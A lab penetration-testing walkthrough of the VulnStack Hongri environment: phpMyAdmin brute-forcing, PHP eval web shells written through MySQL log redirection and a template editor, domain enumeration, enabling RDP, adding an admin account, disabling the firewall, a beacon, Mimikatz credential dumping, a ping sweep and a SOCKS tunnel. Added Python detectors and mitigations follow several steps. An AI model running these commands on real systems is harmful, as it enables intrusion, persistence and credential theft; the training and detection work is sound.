Penetration Testing Walkthrough of VulnStack Red Sun Security Lab Environment One
Configure the lab's domain controller to bind its IPv4 address to the Host-Only network adapter and make sure that adapter is listed first in the adapter binding order. The target systems are Win7, Win2003 and Win2008. On first login to Win2003 and Win2008, Windows reports that the password has expired; set the new password to hongrisec@2020. The Host-Only subnet is 192.168.25.*, and the Win7 NAT interface (the externally reachable one) uses 192.168.88.128.
Begin with reconnaissance: enumerate open ports and fuzz directories. Credential brute-force modules such as those in Metasploit may report hits that look like false positives; try those credentials by hand anyway, since they sometimes work, and record any that do for later reuse.
msfconsole
search auxiliary login
use auxiliary/scanner/http/phpmyadmin_login
show options
set RHOSTS 192.168.88.128
set PASS_FILE /opt/creds.txt
set TARGETURI /phpMyAdmin/index.php
set THREADS 2
run
Common ways to write a web shell through phpMyAdmin:
- Writing the shell directly with a file-export query (needs secure_file_priv to allow it).
- Redirecting the general query log to a file under the web root and logging a payload.
- Redirecting the slow query log in the same way.
- Abusing the error log output for code execution.
- Triggering the local file inclusion in phpMyAdmin 4.8.x.
Identify the web root from phpinfo() (here C:/phpStudy/WWW, exposed at C:/phpStudy/WWW/phpinfo.php). Check secure_file_priv:
SHOW VARIABLES LIKE 'secure_file_priv';
If the value is NULL, MySQL disallows file import and export, so the direct file-export method will not work. Switch to the general log method:
SHOW VARIABLES LIKE 'general%';
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/shell.php';
SELECT '<?php @eval($_POST["x"]); ?>';
Because the general log records every statement the server receives, the SELECT above writes the PHP tag into shell.php under the web root, leaving a usable backdoor there.
A second web application exists beyond what the initial scans showed. Manual inspection reveals a template editor; inserting <?php eval($_POST[exec]); ?> at the top of a PHP template file grants shell access. Paths disclosed by robots.txt lead to further entry points.
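From the defender's side, the two write paths above (file export under secure_file_priv, and log files repointed under the web root with SET GLOBAL) are things a configuration audit can catch. The following is an added example, not code from the original walkthrough: it takes rows in the shape SHOW VARIABLES returns and reports whether any export or log path can land a file inside the web root. The variable names are real MySQL ones; the sample rows, the severity labels and the web root (taken from the phpinfo() path above) are constructed for the example.

```python
"""Audit MySQL file-export and log-path settings for web-root write paths.

Added example, not from the original walkthrough. Input is a list of
(name, value) rows as returned by SHOW VARIABLES; output is a list of
(severity, message) findings. Severity labels are the example's own.
"""
from pathlib import PurePosixPath, PureWindowsPath

# Extensions the web server would hand to an interpreter (assumes a PHP stack).
EXECUTABLE_EXTENSIONS = {".php", ".phtml", ".php5", ".phar", ".jsp", ".asp", ".aspx"}

# Log-file variables that SET GLOBAL can repoint, and the switch that enables each.
LOG_PATH_VARIABLES = ("general_log_file", "slow_query_log_file", "log_error")
LOG_SWITCH_FOR = {"general_log_file": "general_log", "slow_query_log_file": "slow_query_log"}


def _pure(path, windows):
    return PureWindowsPath(path) if windows else PurePosixPath(path)


def path_is_under(path, root):
    """True if path lies inside root; Windows paths compare case-insensitively."""
    windows = "\\" in root or ":" in root
    p, r = _pure(path, windows), _pure(root, windows)
    return p == r or r in p.parents


def audit_mysql_variables(rows, web_root):
    """Return (severity, message) findings for the given variable rows."""
    values = dict(rows)
    findings = []

    if "secure_file_priv" in values:
        sfp = values["secure_file_priv"]
        if sfp.upper() == "NULL":
            findings.append(("info", "secure_file_priv is NULL: INTO OUTFILE / LOAD DATA are disabled"))
        elif sfp == "":
            findings.append(("high", "secure_file_priv is empty: INTO OUTFILE may write anywhere mysqld can"))
        elif path_is_under(web_root, sfp) or path_is_under(sfp, web_root):
            findings.append(("high", f"secure_file_priv ({sfp}) overlaps the web root {web_root}"))

    for var in LOG_PATH_VARIABLES:
        path = values.get(var)
        if not path:
            continue
        switch = LOG_SWITCH_FOR.get(var)
        enabled = switch is None or values.get(switch, "OFF").upper() == "ON"
        if path_is_under(path, web_root):
            # An active log under the web root is a live write primitive; an inactive
            # one only needs a SET GLOBAL to become one.
            findings.append(("critical" if enabled else "high",
                             f"{var} points inside the web root: {path}"))
        elif PureWindowsPath(path).suffix.lower() in EXECUTABLE_EXTENSIONS:
            findings.append(("high", f"{var} has an executable extension: {path}"))
    return findings


# Constructed rows mirroring the lab's state after the SET GLOBAL steps above.
SAMPLE_ROWS = [
    ("secure_file_priv", "NULL"),
    ("general_log", "ON"),
    ("general_log_file", "C:/phpStudy/WWW/shell.php"),
    ("slow_query_log", "OFF"),
    ("slow_query_log_file", "C:/phpStudy/MySQL/data/slow.log"),
    ("log_error", "C:/phpStudy/MySQL/data/error.log"),
]
WEB_ROOT = "C:/phpStudy/WWW"   # from the phpinfo() output in the walkthrough

if __name__ == "__main__":
    for severity, message in audit_mysql_variables(SAMPLE_ROWS, WEB_ROOT):
        print(f"[{severity}] {message}")
```

The check is worth running against the live server rather than the config file, since SET GLOBAL changes never touch my.ini. The mitigations it points at: keep secure_file_priv NULL or set to a dedicated directory, deny the application's MySQL account the FILE privilege and SUPER (or SYSTEM_VARIABLES_ADMIN on 8.0, the privilege SET GLOBAL requires), and run mysqld under an account that has no write access to the web root, so that neither the export nor the log-redirection variants can reach it.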
Proceed to internal network enumeration:
ipconfig /all
route print
net view
arp -a
net start
net share
net share ipc$
net share c$
net use \\192.168.52.X\ipc$ "" /user:""
net use \\192.168.52.X\c$ "pwd" /user:"user"
dir \\192.168.52.X\c$\users
net config workstation
net user
net user /domain
net localgroup administrators
net view /domain
net user username /domain
net group /domain
net group "domain admins" /domain
net group "domain computers" /domain
net group "domain controllers" /domain
The domain is god.org, the domain controller's machine account is OWA$, the domain admin account is Administrator, and the internal range is 192.168.52.0/24. Resolve the DC's IP:
ping owa.god.org
Check whether RDP is listening, then enable it through the registry:
netstat -ano | findstr "3389"
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Create a local administrator account:
net user pentest Pwd123! /add
net localgroup Administrators pentest /add
The RDP connection is still blocked, most likely by the Windows firewall. Disable it and confirm the new state:
netsh advfirewall set allprofiles state off
netsh advfirewall show allprofiles
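The RDP, account and firewall steps above each leave a process-creation record, and together they form a sequence that is far more telling than any one of them. Here is an added example of correlating them, written for this page and not part of the original walkthrough. It assumes Security event 4688 with command-line auditing enabled and runs over constructed records shaped like the fields a SIEM would extract from that event; the hostnames, timestamps and rule names are made up for the example.

```python
"""Correlate Windows process-creation events into one 'local foothold' alert.

Added example, not part of the original walkthrough. It assumes Security
event 4688 with command-line auditing enabled and works on constructed
records shaped like the fields a SIEM would extract from that event
(the account-management events 4720/4732 would confirm the user steps
independently, but this example keys on command lines only).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# technique -> regex applied to the lower-cased command line; net.exe re-spawns
# net1.exe with the same arguments, so both spellings are accepted.
RULES = {
    "rdp_enabled_via_registry": re.compile(
        r"reg(?:\.exe)?\s+add\s+.*fdenytsconnections.*\s/d\s+0\b"),
    "local_user_created": re.compile(
        r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"),
    "added_to_administrators": re.compile(
        r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b"),
    "firewall_disabled": re.compile(
        r"netsh(?:\.exe)?\s+advfirewall\s+set\s+allprofiles\s+state\s+off\b"),
}
WINDOW = timedelta(minutes=30)   # all techniques must fall within this span
MIN_TECHNIQUES = 2               # distinct techniques needed to raise an alert


def classify(command_line):
    """Names of the techniques a single command line matches."""
    cl = command_line.lower()
    return [name for name, rx in RULES.items() if rx.search(cl)]


def correlate(events, window=WINDOW, min_techniques=MIN_TECHNIQUES):
    """One alert per host whose matched command lines, within `window` of the
    host's first match, cover at least `min_techniques` distinct techniques."""
    hits = defaultdict(list)               # host -> [(ts, technique, command_line)]
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["event_id"] != 4688:
            continue
        for tech in classify(ev["command_line"]):
            hits[ev["host"]].append((ev["ts"], tech, ev["command_line"]))

    alerts = []
    for host, matches in hits.items():
        start = matches[0][0]              # window anchored at the first match
        in_window = [m for m in matches if m[0] - start <= window]
        techniques = sorted({m[1] for m in in_window})
        if len(techniques) >= min_techniques:
            alerts.append({"host": host, "first_seen": start, "techniques": techniques,
                           "commands": [m[2] for m in in_window]})
    return alerts


def _ev(ts, host, command_line, event_id=4688):
    return {"ts": datetime.fromisoformat(ts), "host": host,
            "event_id": event_id, "command_line": command_line}


# Constructed 4688 records replaying the RDP/user/firewall steps above on one host,
# plus benign enumeration on another; hostnames and times are made up.
SAMPLE_EVENTS = [
    _ev("2020-05-01T10:00:05", "WIN7-WEB", "netstat -ano"),
    _ev("2020-05-01T10:00:40", "WIN7-WEB",
        'REG ADD "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" '
        '/v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    _ev("2020-05-01T10:01:10", "WIN7-WEB", "net user pentest Pwd123! /add"),
    _ev("2020-05-01T10:01:10", "WIN7-WEB", r"C:\Windows\system32\net1 user pentest Pwd123! /add"),
    _ev("2020-05-01T10:01:30", "WIN7-WEB", "net localgroup Administrators pentest /add"),
    _ev("2020-05-01T10:02:00", "WIN7-WEB", "netsh advfirewall set allprofiles state off"),
    _ev("2020-05-01T11:15:00", "WIN2008-FS", "net user /domain"),
    _ev("2020-05-01T11:15:20", "WIN2008-FS", "netsh advfirewall show allprofiles"),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(f"{alert['host']} @ {alert['first_seen']}: {', '.join(alert['techniques'])}")
        for cmd in alert["commands"]:
            print("   ", cmd)
```

Any single rule here fires on routine administration; the alert only comes from two or more of them on one host inside the window, which is what separates the sequence on WIN7-WEB from the plain enumeration on WIN2008-FS. In a deployment the registry rule should be backed by a 4657 object-access audit on the Terminal Server key, since `reg.exe` is only one of several ways to flip fDenyTSConnections.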
Remote desktop then becomes accessible. In a real engagement the compromised host sits behind NAT and cannot reach an operator machine on a private LAN directly, so C2 traffic should be routed through an internet-facing server rather than attempted from the LAN.
Deploy the beacon payload through that public server, transfer it to the target with AntSword, then launch it:
cd beacon_dir
start beacon.exe
Use the Mimikatz plugin to extract the cleartext domain admin password, hongrisec@2020. Enumerate live hosts in 192.168.52.0/24 with a ping sweep:
for /L %i in (1,1,254) do @ping -w 1 -n 1 192.168.52.%i | findstr "TTL="
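A sweep like the one above is noisy: one source sends echo requests to every address of a /24 within a couple of seconds. The following added example (not from the walkthrough) flags that pattern in flow-style records with a sliding window over distinct destinations per source; the records, the sweeping and monitoring hosts, and the thresholds are constructed for the example.

```python
"""Flag ICMP echo sweeps in flow-style records.

Added example, not from the walkthrough: one source sending echo requests
to many distinct hosts inside a short window is the footprint of the
for /L ... ping loop above. Records are constructed inline; the source,
monitoring host and thresholds are the example's own choices.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ipaddress import ip_network

SWEEP_WINDOW = timedelta(seconds=60)
SWEEP_THRESHOLD = 20            # distinct destinations inside one window


def detect_icmp_sweeps(records, window=SWEEP_WINDOW, threshold=SWEEP_THRESHOLD):
    """Return one alert per source that reaches `threshold` distinct echo-request
    destinations within any span of length `window`."""
    per_src = defaultdict(list)
    for r in sorted(records, key=lambda r: r["ts"]):
        if r["proto"] == "icmp" and r["icmp_type"] == 8:     # 8 = echo request
            per_src[r["src"]].append((r["ts"], r["dst"]))

    alerts = []
    for src, flows in per_src.items():
        window_flows = deque()              # flows inside the sliding window
        live = defaultdict(int)             # dst -> count inside the window
        for ts, dst in flows:
            window_flows.append((ts, dst))
            live[dst] += 1
            while ts - window_flows[0][0] > window:          # expire old flows
                _, old_dst = window_flows.popleft()
                live[old_dst] -= 1
                if live[old_dst] == 0:
                    del live[old_dst]
            if len(live) >= threshold:
                subnets = {str(ip_network(f"{d}/24", strict=False)) for d in live}
                alerts.append({"src": src, "distinct_dsts": len(live),
                               "subnets": sorted(subnets),
                               "first": window_flows[0][0], "until": ts})
                break                       # one alert per source is enough
    return alerts


def _sample_records():
    """Constructed records: one host sweeping 192.168.52.1-254 at ~8 pings/s,
    plus a monitoring box that pings three servers every 30 seconds."""
    base = datetime(2020, 5, 1, 10, 30, 0)
    recs = []
    for i in range(1, 255):
        recs.append({"ts": base + timedelta(milliseconds=120 * i), "src": "192.168.52.100",
                     "dst": f"192.168.52.{i}", "proto": "icmp", "icmp_type": 8})
    for k in range(10):
        for dst in ("192.168.52.2", "192.168.52.138", "192.168.52.141"):
            recs.append({"ts": base + timedelta(seconds=30 * k), "src": "192.168.52.250",
                         "dst": dst, "proto": "icmp", "icmp_type": 8})
    return recs


SAMPLE_RECORDS = _sample_records()

if __name__ == "__main__":
    for alert in detect_icmp_sweeps(SAMPLE_RECORDS):
        print(f"{alert['src']} swept {alert['distinct_dsts']} hosts in "
              f"{', '.join(alert['subnets'])} between {alert['first']} and {alert['until']}")
```

The threshold of 20 distinct destinations in 60 seconds separates the sweep from the monitoring host, which never exceeds three. On a real network the same logic applies to TCP SYNs to a fixed port, and the baseline for legitimate scanners (patch management, asset inventory) should be captured as an allow-list of sources rather than by raising the threshold.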
Three hosts respond. Because they have no outbound connectivity, establish a SOCKS proxy with Neo-reGeorg (neoreg.py) and ProxyChains:
# Generate the tunnel scripts (tunnel.php among them), protected by a key
python3 neoreg.py generate -k tunnelkey
# After uploading tunnel.php to the pivot host, start the local SOCKS listener against it
python3 neoreg.py -k tunnelkey -u http://192.168.192.197/tunnel.php
Point /etc/proxychains.conf at the local SOCKS listener that neoreg.py opens, so internal tools can be chained through the compromised node.